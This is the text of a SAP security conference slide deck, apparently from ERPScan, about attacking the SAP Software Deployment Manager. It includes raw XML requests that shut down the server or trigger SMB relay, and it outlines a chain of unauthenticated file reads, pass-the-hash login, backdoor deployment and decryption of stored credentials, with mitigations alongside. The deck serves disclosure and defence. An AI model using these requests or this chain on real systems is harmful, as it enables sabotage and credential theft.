Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server
2 likes876 views
The document discusses security vulnerabilities in SAP J2EE systems, emphasizing the risks of espionage, fraud, and sabotage. It describes various attack methods targeting SAP's Software Deployment Manager (SDM) and the implications of unauthorized access, including the ability to deploy malicious code. The importance of security measures, regular assessments, and collaboration with SAP's security team is highlighted to mitigate these risks.
![A_ack
SAP
SDM.
DoS
• If
a‚acker
uses
an
incorrect
password
3
&mes,
the
server
will
shutdown
automa&cally
• Also,
if
you
send
this
request,
you
can
shutdown
the
SDM
server
manually:
[10 spaces]56<?xml version="1.0"?>
<ShutDownRequest></ShutDownRequest>
22](https://image.slidesharecdn.com/2014troopers-150626114817-lva1-app6891/85/Injecting-evil-code-in-your-SAP-J2EE-systems-Security-of-SAP-Software-Deployment-Server-22-320.jpg)
![A_acking
SAP
SDM.
SMB
relay
Packed:
[10 Spaces]<?xml version="1.0"?>
<FileAccessRequest f="ip_addrblabla"> </
FileAccessRequest>
An
old
trick,
but
some&mes
it’s
very
useful
23](https://image.slidesharecdn.com/2014troopers-150626114817-lva1-app6891/85/Injecting-evil-code-in-your-SAP-J2EE-systems-Security-of-SAP-Software-Deployment-Server-23-320.jpg)
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server
- 1. Invest in security to secure investments Injec&ng evil code in your SAP J2EE systems: Security of SAP So<ware Deployment Server Dmitry Chastukhin. Director of SAP pentest/ research team ERPScan
- 2. About ERPScan • The only 360-‐degree SAP Security solu&on -‐ ERPScan Security Monitoring Suite for SAP • Leader by the number of acknowledgements from SAP ( 150+ ) • 60+ presentaDons key security conferences worldwide • 25 Awards and nominaDons • Research team -‐ 20 experts with experience in different areas of security • Headquarters in Palo Alto (US) and Amsterdam (EU) 2
- 3. SAP Вставьте рисунок на слайд, скруглите верхний левый и нижний правый угол (Формат – Формат рисунка), добавьте контур (оранжевый, толщина – 3) 3 • The most popular business applica&on • More than 250000 customers worldwide • 83% Forbes 500 companies run SAP • Main system – ERP • 3 Plaporms - NetWeaver ABAP - NetWeaver J2EE - BusinessObjects
- 4. SAP insecurity Espionage • Stealing financial informa&on • Stealing corporate secrets • Stealing supplier and customer lists • Stealing HR data Fraud • False transac&ons • Modifica&on of master data Sabotage • Denial of service • Modifica&on of financial reports • Access to technology network (SCADA) by trust rela&ons 4
- 5. 5 More than 2800 in total Source: SAP Security in Figures 0 100 200 300 400 500 600 700 800 900 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013 2014 SAP vulnerabiliDes
- 6. Is it remotely exploitable? 6 > 5000 non-‐web SAP services exposed in the world including Dispatcher, Message Server, Sap Host Control, etc. sapscan.com
- 7. What about other services? 0 1 2 3 4 5 6 7 8 9 SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Server httpd 7 Source: SAP Security in Figures
- 8. • SAP NetWeaver ABAP • SAP NetWeaver J2EE – SAP Portal – SAP Solu&on Manager – SAP NetWeaver Development Infrastracture (NWDI) • SAP BusinessObjects • SAP HANA Extended Applica&on Services • SAP SUP • SAP Fiori 8 SAP ApplicaDon server’s
- 9. • Design Time Repository (DTR) • Component Build Service (CBS) • Change Management Service (CMS) • So<ware Landscape Directory (SLD) / NS • So<ware Deployment Manager (SDM) 9 SAP NetWeaver development infrastructure
- 12. 12 SAP NetWeaver development infrastructure
- 13. 13 SAP NetWeaver development infrastructure
- 14. 14 SAP NetWeaver development infrastructure
- 15. 15 SAP NetWeaver development infrastructure
- 16. So^ware Deployment Manager • Single interface for the deployment • Deploy apps (*.ear, *.war, *.sda) • Implement custom patches 16
- 17. SDM server • Different server modes – standalone – integrated • Only one user at &me • Only hardcoded admin user • Three ports: – 50017 – Admin Port – 50018 – GUI Port – 50019 – H‚p Port 17
- 18. SDM client • Browsing the distribu&on of deployed components • Deploying and undeploying • Log viewing 18
- 19. SDM a_ack intro • SAP infrastructure includes many Java services • Almost all Java stuff uses UME • Universal user with a password • Only one user at a &me • Ability to deploy evil code => plus, see 1st item 19
- 20. SDM a_ack intro • Thick client Java applica&on (sad story) • Scarce communica&ons se…ngs • Difficult to intercept • Custom protocols 20
- 21. SDM a_ack intro • SAP has its own SAP Java Virtual Machine (JVM) • Java 6 has A‚ach API • A‚ach to another running JVM • Intercept and modify calls 21
- 22. A_ack SAP SDM. DoS • If a‚acker uses an incorrect password 3 &mes, the server will shutdown automa&cally • Also, if you send this request, you can shutdown the SDM server manually: [10 spaces]56<?xml version="1.0"?> <ShutDownRequest></ShutDownRequest> 22
- 23. A_acking SAP SDM. SMB relay Packed: [10 Spaces]<?xml version="1.0"?> <FileAccessRequest f="ip_addrblabla"> </ FileAccessRequest> An old trick, but some&mes it’s very useful 23
- 24. PrevenDon 24 • Install note 1724516 • Enable the security features of SDM • SDM server and SDM client need to be updated h‚ps://websmp205.sap-‐ag.de/~sapidb/012006153200000493902012E/ SDM_EnablingSecurity.pdf
- 25. From Nobody to Administrator Now, I will show an interes0ng a2ack Compromise Some SAP Services Compromise SAP SDM Compromise SAP Server OS Compromise SAP 25
- 26. SDM authenDcaDon abuse • OK. Let’s see how authen&ca&on in SDM works: – user enters password – hash is calculated locally on client – password hash is sent to server – hash is compared to hash from configura&on file Pass the hash a_ack here! 26
- 27. SDM authenDcaDon abuse RootFrame.class 27
- 28. SDM authenDcaDon abuse …SDMprogramconfigsdmrepository.sdc 28
- 29. SDM authenDcaDon abuse SMDAuthen&catorImpl.class 29
- 30. A_ack on SAP SDM Read sdmrepository.sdc Get password hash Use hash as password to authen&cate on SDM server Deploy backdoor on SAP Server PROFIT! 30
- 31. File read • OS command execu&on through CTC (Notes 1467771, 1445998 ) • XML External En&&es (Note 1619539) • Directory Traversal (Note 1630293 ) • Through MMC file read func&on (Notes 927637 and 1439348) We have something new for u J 31
- 32. SAP Log Viewer standalone • Open ports: 26000 (NI), 1099 (RMI), 5465 (Socket) • You can: – View log on local server – View log on remote server – Register file as log file Read log file without authenDcaDon! 32
- 33. SAP Log Viewer standalone A_ack is pre_y easy Connect to LogViewer standalone Server Register sdmrepository.sdc file as log file Read it 33
- 34. SAP Log Viewer standalone 34
- 35. SAP Log Viewer standalone When we have a password hash, we can use it as password to authen&cate on SDM server 35
- 36. SDM intrusion Full info about the SDM repository 36
- 37. Bypassing SDM restricDons • Observe all server directories • Read arbitrary files via Log Viewer 37
- 38. SDM undeploying Undeploy any applica&on 38
- 39. SDM backdooring Deploy any applica&on 39
- 40. SDM backdooring • before • a<er 40
- 41. SDM post-‐exploitaDon 41
- 42. PrevenDon 42 • Install Note 1724516, 1685106 • Enable the security features of SDM • SDM server and SDM client need to be updated h‚ps://websmp205.sap-‐ag.de/~sapidb/012006153200000493902012E/ SDM_EnablingSecurity.pdf
- 43. “The So=ware Deployment Manager (SDM) uses the database connec0on informa0on, the J2EE Engine administrator user and password from the secure storage in the file system, to connect to the J2EE Engine and perform tasks such as so=ware deployment and undeployment”. h‚p://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/ 2e104202795e33e10000000a155106/content.htm Wow! J2EE Engine administrator user and password Where is all this stuff located? SAP SecStore 43
- 44. SAP SecStore “By default, the J2EE Engine stores secure data in the file usr sap<SID>SYSglobalsecuritydataSecStore.proper0es in the file system”. “The J2EE Engine uses the SAP Java Cryptography Toolkit to encrypt the contents of the secure store with the tripleDES algorithm”. h‚p://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/ 2e104202795e33e10000000a155106/content.htm OK. Let’s try to read SecStore.proper0es 44
- 45. SAP SecStore • We can execute any OS command (we have our backdoor) • We know the SAP J2EE Engine stores the database user SAP<SID>DB; its password is here: usrsap<SID>SYSglobalsecuritydataSecStore.properties • It’s all that we need 45
- 47. Get the password • We have an encrypted password • We have a key to decrypt it 47 We got the J2EE admin and JDBC login:password!
- 48. PrevenDon 48 Restrict read access to files SecStore.proper0es and SecStore.key h‚p://help.sap.com/saphelp_nw73ehp1/helpdata/en/cd/ 14c93ec2f7df6ae10000000a114084/content.htm
- 50. SDM hacking demo 50
- 51. SAP Guides It’s all in your hands Regular security assessments ABAP code review Monitoring technical security SegregaDon of DuDes Security events monitoring Conclusion It is possible to protect yourself from these kinds of issues, and we are working close with SAP to keep customers secure
- 52. Future work I'd like to thank SAP's Product Security Response Team for the great coopera0on to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new a2acks and demos, follow us at @erpscan and a2end future presenta0ons: 52 web: www.erpscan.com e-‐mail: info@erpscan.com, sales@erpscan.com